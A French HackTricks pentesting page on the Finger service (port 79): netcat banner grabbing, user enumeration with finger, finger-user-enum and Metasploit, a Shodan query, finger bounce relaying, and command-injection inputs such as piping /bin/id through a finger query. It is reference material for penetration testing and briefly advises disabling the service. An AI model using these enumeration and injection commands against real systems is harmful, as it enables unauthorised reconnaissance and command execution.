hacktricks/network-services-pentesting/pentesting-finger.md
2023-06-03 13:10:46 +00:00

79 lines
4.5 KiB
Markdown

## **Informations de base**
**Finger** est un programme que vous pouvez utiliser pour trouver des informations sur les utilisateurs d'ordinateurs. Il affiche généralement le nom d'utilisateur, le nom complet et éventuellement d'autres détails sur l'utilisateur que vous interrogez. Ces détails peuvent inclure l'emplacement du bureau et le numéro de téléphone (si connu), l'heure de connexion, le temps d'inactivité, l'heure à laquelle le courrier a été lu pour la dernière fois, ainsi que les fichiers de plan et de projet de l'utilisateur.
**Port par défaut:** 79
```
PORT STATE SERVICE
79/tcp open finger
```
## **Énumération**
### **Récupération de bannière/Connexion de base**
```bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
```
### **Énumération d'utilisateurs**
---
#### **Finger**
Le service Finger est un service de recherche d'informations sur les utilisateurs d'un système. Il est généralement utilisé pour obtenir des informations sur les utilisateurs d'un système distant. Le service Finger est généralement disponible sur les systèmes Unix et Linux.
Pour utiliser le service Finger, il suffit de se connecter au système distant et d'exécuter la commande `finger`. La commande `finger` affiche une liste des utilisateurs du système distant, ainsi que des informations sur ces utilisateurs, telles que leur nom, leur adresse électronique et leur dernière heure de connexion.
Le service Finger peut être utilisé pour effectuer une énumération d'utilisateurs sur un système distant. En utilisant le service Finger, un attaquant peut obtenir une liste des utilisateurs du système distant, ce qui peut l'aider à cibler ses attaques.
#### **Comment se protéger**
Pour se protéger contre l'énumération d'utilisateurs via le service Finger, il est recommandé de désactiver le service Finger sur les systèmes Unix et Linux. Si le service Finger est nécessaire, il est recommandé de limiter l'accès au service Finger aux utilisateurs autorisés uniquement.
```bash
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
```
Alternativement, vous pouvez utiliser **finger-user-enum** de [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), voici quelques exemples :
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
#### **Nmap exécute un script pour utiliser les scripts par défaut**
### Metasploit utilise plus de techniques que Nmap
```
use auxiliary/scanner/finger/finger_users
```
### Shodan
* `port:79 USER`
## Exécution de commandes
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
## Rebond de Finger
[Utiliser un système comme relais de finger](https://securiteam.com/exploits/2BUQ2RFQ0I/)
```
finger user@host@victim
finger @internal@external
```
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
- Travaillez-vous dans une entreprise de **cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
- Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
- **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) **groupe Discord** ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Partagez vos astuces de piratage en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
</details>